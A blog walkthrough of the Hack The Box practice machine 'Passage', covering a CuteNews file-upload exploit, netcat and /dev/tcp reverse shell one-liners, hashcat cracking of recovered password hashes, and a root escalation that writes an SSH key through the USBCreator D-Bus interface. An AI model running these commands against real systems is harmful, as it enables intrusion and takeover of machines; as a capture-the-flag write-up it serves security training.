Hack The Box — Passage

Hey folks, today we have a new machine from Hack The Box “Passage” which is a medium box and have new techniques in the privilege escalation part, let’s take a look at its info

As usual, we have some steps which we follow to pwn any machine, our steps are:

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

After finishing our steps we will have these informations, stay calm and follow reading :)

In this step we aim to collect all these informations, which we can collect on a specific target like its open ports, security mode of login systems, directories, OS version, services versions, etc

We will start this step by scanning all ports to discover the open ports and know where we will get into this machine

nmap -sS -sV -T4 -O

we have only 2 open ports 80/22 so we will start scan our website on port 80

I’ve already searched for any public exploit for the version of the Apache, but there’s no interesting exploit.

We have a template website, and we don’t find any interesting information and if you notice in the upper right side there’s no any redirection happened, so we will start checking the source code

We have a CuteNews directory and after searching about it, I’ve found that it’s a CMS “Content Management System”.

Let’s try to access it

We have a login portal and also the version of the CMS is CuteNews 2.1.2

Let’s try to search for any public exploit for this version

We have authenticated arbitrary file upload vulnerability, and for Google searching

We also have the exploit code CVE-2019–11447 which asks us to be authenticated.

In this step we aim to scan all collected info from the previous one.

So, create an account and try to execute it

It uploads a PHP file which will execute the cmd content on the system, let’s try to access the file directory and execute a reverse shell code

As you can see when I entered whoami it executed it to the server, so let’s try to open a shell from this variable, we have an OS command injection.

Let’s execute nc 10.10.xx.xx 1234 -e /bin/bash or bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1 and encode it as url encoding.

And after executed it to the server and listened on the specific port using netcat

I’ve gained a shell :)

Let’s try to escalate our privileges to have another user role or privileges.

Let’s check the files of /var/www/html/CuteNews/cdata/users

We have multiple PHP files which we can start scan the files which have large size because it may contain juicy informations.

For these 2 files we have base64 code which we need to decode it by using any online or offline tool

echo "the_encoded_text_here" | base64 -d

After decoding it we have passwords for paul and nadav but they’re hashed.

At the first we need to know the hash type by using Hash Analyzer

They’re SHA2–256

For now, we need to break them using any online decrypt tool, hashcat or john

hashcat -m 1400 paul.hash -w rockyou.txt

The results are paul:atlanta1

We can also access the user text.

After that we need to get the second user nadav

By searching and enumerating the paul directory, I’ve found the .ssh directory which contain id_rsa file

There’s a hint at the machine discussion says that the 2 users shares all things with together

So let’s try to use it and login as nadav

It works and we have only one step to get the root account.

By using PsPy64 to know the system processes,I’ve noticed that there’s a process ibus which executed every seconds

After searching for how to use it to open a shell, I’ve found these 2 amazing resources

The second blog is written by someone called Nadav “The machine creator”

After following hacktricks enumeration steps by checking for the D-Bus interfaces

busctl list

I’ve found that there’s an interface called USBCreator which have privilegesroot

After some search about how to use it to open a root shell, I’ve found that you can use it to overwrite a file into the root directory, so I can generate my own rsa file and copy it the root /root/.ssh/authorized_keys directory to be authenticated as a root to the system

Let’s generate our rsa key, and then copy the public one to the root directory.

Use this code to perform the transportation process

gdbus  call  --system --dest com.ubuntu.USBCreator  --object-path /com/ubuntu/USBCreator  --method com.ubuntu.USBCreator.Image /home/nadav/eslam_rsa.pub  /root/.ssh/authorized_keys true

And then try to access the root account using the private ssh key

ssh -i id_rsa root@

If you speak Arabic, you can watch my walkthrough which I’ve explained all these steps from here

If you find it helpful, Kindly give me a respect from here eslam3kl — HTB

LinkedIn | GitHub | Twitter

Offensive Security Enthusiast

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store